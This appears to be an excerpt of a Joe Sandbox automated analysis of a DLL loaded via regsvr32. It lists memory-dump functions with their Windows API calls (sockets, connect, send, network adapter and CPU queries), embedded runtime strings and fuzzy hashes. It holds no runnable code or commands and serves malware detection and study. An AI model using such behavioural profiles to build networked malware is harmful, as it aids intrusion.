                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: ($($($($($($($($($($(
                                                                  • API String ID: 2221118986-3337016023
                                                                  • Opcode ID: b40a8ae007ee8b51ade550ecaa414e76319589547d4e46e3f03c8fca436107c0
                                                                  • Instruction ID: 23424a356068af353f7dc6aa85b47f08cd0084a862dee7336d24bd8e08951271
                                                                  • Opcode Fuzzy Hash: b40a8ae007ee8b51ade550ecaa414e76319589547d4e46e3f03c8fca436107c0
                                                                  • Instruction Fuzzy Hash: 5AC1AD71C0A7988AEB21CF18C8457EDBBB0BF95308F14959CD9882B352DB715A89CF91
                                                                  APIs
                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 026336F0
                                                                  • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02633729
                                                                  • WSACreateEvent.WS2_32 ref: 0263375B
                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,0264DA88), ref: 0263376D
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,0264DA88), ref: 02633779
                                                                  • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,0264DA88), ref: 02633798
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0264DA88), ref: 026337A4
                                                                  • gethostbyname.WS2_32(00000000), ref: 026337B2
                                                                  • htons.WS2_32(?), ref: 026337D8
                                                                  • WSAEventSelect.WS2_32(?,?,00000030), ref: 026337F6
                                                                  • connect.WS2_32(?,?,00000010), ref: 0263380B
                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,0264DA88), ref: 0263381A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharEventMultiWidelstrlen$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                  • String ID:
                                                                  • API String ID: 1463362053-0
                                                                  • Opcode ID: c7e3700f0ef3b4c8b30f6d3f29a1ffa67155c80f1ff3ea40402055d4547b4231
                                                                  • Instruction ID: 3e9852b3317c3255c85a94fc32d58fd4be7f01d6a227c8227e2d73d297a5948e
                                                                  • Opcode Fuzzy Hash: c7e3700f0ef3b4c8b30f6d3f29a1ffa67155c80f1ff3ea40402055d4547b4231
                                                                  • Instruction Fuzzy Hash: 74419DB5A40245ABE720DBA4DC89F7FB7B8EF48710F504619FA52972C0C770A950CBA4
                                                                  APIs
                                                                  Strings
                                                                  • VirtualProtect failed with code 0x%x, xrefs: 6C94CF56
                                                                  • Mingw-w64 runtime failure:, xrefs: 6C94CE18
                                                                  • VirtualQuery failed for %d bytes at address %p, xrefs: 6C94CF87
                                                                  • Address %p has no image-section, xrefs: 6C94CF9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                  • API String ID: 1616349570-1534286854
                                                                  • Opcode ID: be0a6309edb185d0e6c65b76495ad6d713a11f9f541b5e72474def670142bc10
                                                                  • Instruction ID: 3e54bdaa26c9dfc6643dce01af5174313a10d40dd0a886c865bfdd8b28efd61e
                                                                  • Opcode Fuzzy Hash: be0a6309edb185d0e6c65b76495ad6d713a11f9f541b5e72474def670142bc10
                                                                  • Instruction Fuzzy Hash: 845157B1A093019FC700EF69D48465AFBF4FB99318F14CA5DE8889B715E734E948CB92
                                                                  APIs
                                                                  • realloc.MSVCRT ref: 6C86ED44
                                                                  • GetAdaptersAddresses.IPHLPAPI(00000000,0000000E,00000000,00000000,00003C00), ref: 6C86ED61
                                                                  • free.MSVCRT ref: 6C86EDD0
                                                                  • memcpy.MSVCRT(00000000,failed to allocate memory for IP_ADAPTER_ADDRESSESGetAdaptersAddresses() failed with code ,00000032), ref: 6C86EDFC
                                                                  • free.MSVCRT ref: 6C86EE05
                                                                  • free.MSVCRT ref: 6C86EE4A
                                                                  • free.MSVCRT ref: 6C86EE5B
                                                                  Strings
                                                                  • failed to allocate memory for IP_ADAPTER_ADDRESSESGetAdaptersAddresses() failed with code , xrefs: 6C86EDF6
                                                                  • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 6C86ED23
                                                                  • Gid, xrefs: 6C86EE88
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: free$AdaptersAddressesmemcpyrealloc
                                                                  • String ID: Gid$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs$failed to allocate memory for IP_ADAPTER_ADDRESSESGetAdaptersAddresses() failed with code
                                                                  • API String ID: 2404723152-66611615
                                                                  • Opcode ID: b3299872c382ef2a5c14acd4002bb67eeeee34893b879bd829432163f875df32
                                                                  • Instruction ID: c36f48ba8debca24497d83f34731a7fbcbf1c4d33182e7e0b675290d804df896
                                                                  • Opcode Fuzzy Hash: b3299872c382ef2a5c14acd4002bb67eeeee34893b879bd829432163f875df32
                                                                  • Instruction Fuzzy Hash: B94192B1D01208AFDB10DFA4DD41BEEB7F8AF25309F144429E908AB741E771DA08CBA1
                                                                  APIs
                                                                  • PdhOpenQueryA.PDH(00000000,00000000,?,?,00000000,00000000), ref: 6C85B66A
                                                                  • PdhAddEnglishCounterA.PDH(00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6C85B688
                                                                  • PdhCloseQuery.PDH(00000000,00000000,00000005,00000000,00000000,00000000,00000000,LoadUpdateEvent,00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000,?), ref: 6C85B694
                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,LoadUpdateEvent,00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6C85B6C0
                                                                  • PdhCollectQueryDataEx.PDH(00000000,00000005,00000000,00000000,00000000,00000000,LoadUpdateEvent,00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6C85B6D5
                                                                  • RegisterWaitForSingleObject.KERNEL32(00000000,00000000,6C85B4C0,00000000,000000FF,00000000), ref: 6C85B6F7
                                                                  • PdhCloseQuery.PDH(00000000,00000000,00000000,00000000,LoadUpdateEvent,00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000), ref: 6C85B73E
                                                                  • PdhRemoveCounter.PDH(00000000,00000000,00000005,00000000,00000000,00000000,00000000,LoadUpdateEvent,00000000,\System\Cpu Queue Length,00000000,00000000,00000000,00000000), ref: 6C85B794
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Query$CloseCounter$CollectCreateDataEnglishEventObjectOpenRegisterRemoveSingleWait
                                                                  • String ID: LoadUpdateEvent$\System\Cpu Queue Length
                                                                  • API String ID: 650704249-2417354242
                                                                  • Opcode ID: 09eea6a5ac2f7035f2bfb0283c7df8f3235a4e86658505b5beecfa19a7233451
                                                                  • Instruction ID: 8ff83bb66654688f80096c32bcc3b6afb038a2f32cd4e197fe9acef4d52851da
                                                                  • Opcode Fuzzy Hash: 09eea6a5ac2f7035f2bfb0283c7df8f3235a4e86658505b5beecfa19a7233451
                                                                  • Instruction Fuzzy Hash: 2431E870C00709AADB20CFA5CD04FEFB7F5BF60308F608929E425A6AD0E7B5D5588B90
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 6C8FA75C
                                                                  • GetFullPathNameW.KERNEL32(?,00000200,?,00000000,00000000), ref: 6C8FA76B
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,?,00000200,?,00000000,00000000), ref: 6C8FA776
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,?,00000200,?,00000000,00000000), ref: 6C8FA78B
                                                                  • memcmp.MSVCRT(?,950F5D07,950F5CFF,?,00000200,?,00000000,00000000), ref: 6C8FA7F5
                                                                  • memcpy.MSVCRT(00000002,?,950F5CFF,?,00000000,00000000), ref: 6C8FA8C7
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,?,00000200,?,00000000,00000000), ref: 6C8FA809
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FreeFullHeapNamePathmemcmpmemcpy
                                                                  • String ID:
                                                                  • API String ID: 1844123116-0
                                                                  • Opcode ID: c6fe174ad1e67bbe084dbcee0df08d8e00900df60b4cee310d13afc2be05863f
                                                                  • Instruction ID: 1498102ac5e5b208d516f44bfdb73015defbcfff1038e817046dab8f0886f1c9
                                                                  • Opcode Fuzzy Hash: c6fe174ad1e67bbe084dbcee0df08d8e00900df60b4cee310d13afc2be05863f
                                                                  • Instruction Fuzzy Hash: A3C1F875E002199FDB208FA8CE85BEEB7B4EF14768F144825E824B7741E771DD068BA1
                                                                  APIs
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C894F67
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C894FDB
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C895034
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C89506C
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C8950A3
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C8950DE
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C89513E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID: -$?$@$}
                                                                  • API String ID: 3510742995-215791323
                                                                  • Opcode ID: 69d477a320ffa04a8f262f88bdf9f5849ddc4ae15b177930c6f9a0e35f142fde
                                                                  • Instruction ID: 51b7926247118aea9416c9b1cdea660e655e8365b1d73c259ad26096d1d90d28
                                                                  • Opcode Fuzzy Hash: 69d477a320ffa04a8f262f88bdf9f5849ddc4ae15b177930c6f9a0e35f142fde
                                                                  • Instruction Fuzzy Hash: 5FA1E1B1D006199FDB21CF58DC80FEA73B8FF81319F048969FA19AB642D3349945CBA5
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(?,6C95405C,?,?,?,?,6C87FB50,6C95405C,00000000,?,6C87F9CD,00000000,00000001), ref: 6C86EEB6
                                                                  • TlsGetValue.KERNEL32(00000000,?,?,00000000,6C87F9CD,00000000,00000001,?,?,?,?,?,?,?,00000001), ref: 6C86EF0F
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,?,00000000,6C87F9CD,00000000,00000001,?,?,?,?,?,?,?), ref: 6C86EF1B
                                                                  • TlsGetValue.KERNEL32(00000000,6C87F9CD,00000000,00000001,?,?,?,?,?,?,?,00000001,?,6C86A3E7), ref: 6C86EF71
                                                                  • TlsGetValue.KERNEL32(-00000001), ref: 6C86EFFB
                                                                  • ProcessPrng.BCRYPTPRIMITIVES(?,00000010,-00000001), ref: 6C86F03B
                                                                  • TlsGetValue.KERNEL32(-00000001), ref: 6C86F06F
                                                                  • TlsSetValue.KERNEL32(-00000001,00000000,-00000001), ref: 6C86F07B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$PrngProcess
                                                                  • String ID:
                                                                  • API String ID: 3259538350-0
                                                                  • Opcode ID: 6584dfd4f9f59c49b5b1645cdddc22489d5f1538ceab16b8ef7d82314bec0370
                                                                  • Instruction ID: 29eb0b69ccedaabe4b5c35e9e1fc07707486cbc80191026487d1fe35b7ea103c
                                                                  • Opcode Fuzzy Hash: 6584dfd4f9f59c49b5b1645cdddc22489d5f1538ceab16b8ef7d82314bec0370
                                                                  • Instruction Fuzzy Hash: 1C718E705012045FE7219B358D40FEA77A8BF6171CF054964F9589BF41EB71E90887E1
                                                                  APIs
                                                                  • SetLastError.KERNEL32(0000139F,026491B4,?,?,?), ref: 02634CD6
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02634CFD
                                                                  • SetLastError.KERNEL32(0000139F), ref: 02634D11
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02634D18
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalErrorLastSection$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 2124651672-0
                                                                  • Opcode ID: 5e2d3de765047ab82cd7e02a2792e6b01c1d2ce168f33af85dd699b5a50f4bec
                                                                  • Instruction ID: ec45896c3b0682c6b5737855ba1fb1dcc89aac982f4c33202f6d10eb678bac20
                                                                  • Opcode Fuzzy Hash: 5e2d3de765047ab82cd7e02a2792e6b01c1d2ce168f33af85dd699b5a50f4bec
                                                                  • Instruction Fuzzy Hash: 2051AD7AA046409FC715DFA8E984BAEF7F5FB48710F00492EE95A87780DB35B800CB90
                                                                  APIs
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02633DE5
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02633E30
                                                                  • send.WS2_32(02633AE3,?,?,00000000), ref: 02633E4E
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02633E61
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02633E74
                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,02633AE3), ref: 02633E9C
                                                                  • WSAGetLastError.WS2_32(?,02633AE3), ref: 02633EA7
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02633EBB
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02633EF4
                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,02633AE3), ref: 02633F31
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                  • String ID:
                                                                  • API String ID: 1701177279-0
                                                                  • Opcode ID: 7b47f9c2ce92a840ad89de0d557cd282db77d0bcf36097981bdd04cae15f031a
                                                                  • Instruction ID: a7cf588814c2fc6aa0a6805adf735f59f61912d6988bfcf98a44c07740059be8
                                                                  • Opcode Fuzzy Hash: 7b47f9c2ce92a840ad89de0d557cd282db77d0bcf36097981bdd04cae15f031a
                                                                  • Instruction Fuzzy Hash: 31410775A046009FC725CF74D988BABB7F8BB49704F4489AEE95ECB340D771A8518FA0
                                                                  APIs
                                                                  • WSASetLastError.WS2_32(0000000D,00000000,?), ref: 02634F53
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02634F68
                                                                  • WSASetLastError.WS2_32(00002746), ref: 02634F7A
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02634F81
                                                                  • timeGetTime.WINMM ref: 02634FAF
                                                                  • timeGetTime.WINMM ref: 02634FD7
                                                                  • SetEvent.KERNEL32(?), ref: 02635015
                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02635021
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02635028
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 0263503B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                  • String ID:
                                                                  • API String ID: 1979691958-0
                                                                  • Opcode ID: 99c7eab95cbb2d302f0dcd887011cd6cf0fe84aae2903001dbf3047fd651e9d3
                                                                  • Instruction ID: 57049a0aedec281385fb1a4c8c93679a91b332403093cd71e9c024f42117fe51
                                                                  • Opcode Fuzzy Hash: 99c7eab95cbb2d302f0dcd887011cd6cf0fe84aae2903001dbf3047fd651e9d3
                                                                  • Instruction Fuzzy Hash: 4841D035A043009FD7219F29D988B6AF7E5BF88714F444A59E88AC7740E732E8858B80
                                                                  APIs
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D94C
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D951
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D956
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D95B
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D960
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D965
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96A
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96F
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D974
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D979
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: abort
                                                                  • String ID:
                                                                  • API String ID: 4206212132-0
                                                                  • Opcode ID: 795ad5ba9f1443d1a207bfee6eec0e68aaea01f56df510d42a3205860efb64d9
                                                                  • Instruction ID: 95cc41ef1583cb4808447f1d72d852c270d62d998e9fc8c0cc9f65a2e814dcb7
                                                                  • Opcode Fuzzy Hash: 795ad5ba9f1443d1a207bfee6eec0e68aaea01f56df510d42a3205860efb64d9
                                                                  • Instruction Fuzzy Hash: 6321D6723092158FD704CF68E891B96B7E6FFC2218F68C27EE5488B755D636E806CB50
                                                                  Strings
                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 6C94D26E
                                                                  • Unknown pseudo relocation bit size %d., xrefs: 6C94D10C
                                                                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C94D0C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                  • API String ID: 0-1286557213
APIs
• VariantToPropVariant.PROPSYS(?,?), ref: 6C8979DB
• PropVariantClear.OLE32(?), ref: 6C897A35
• VariantToPropVariant.PROPSYS(?,?,?), ref: 6C897A44
  • Part of subcall function 6C89A890: GetErrorInfo.OLEAUT32(00000000,00000000,00000000,?,?,6C8768BC,00000000,?,0000003C,00000000), ref: 6C89A8A5
• PropVariantClear.OLE32(?,?,?), ref: 6C897A85
• PropVariantCompareEx.PROPSYS(?,?,00000000,00000000,?,?,?), ref: 6C897B4B
• PropVariantClear.OLE32(?,?,?,?), ref: 6C897B72
• PropVariantClear.OLE32(?,?,?,?,?), ref: 6C897B7C
• PropVariantClear.OLE32(?), ref: 6C897BC9
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
Joe Sandbox IDA Plugin
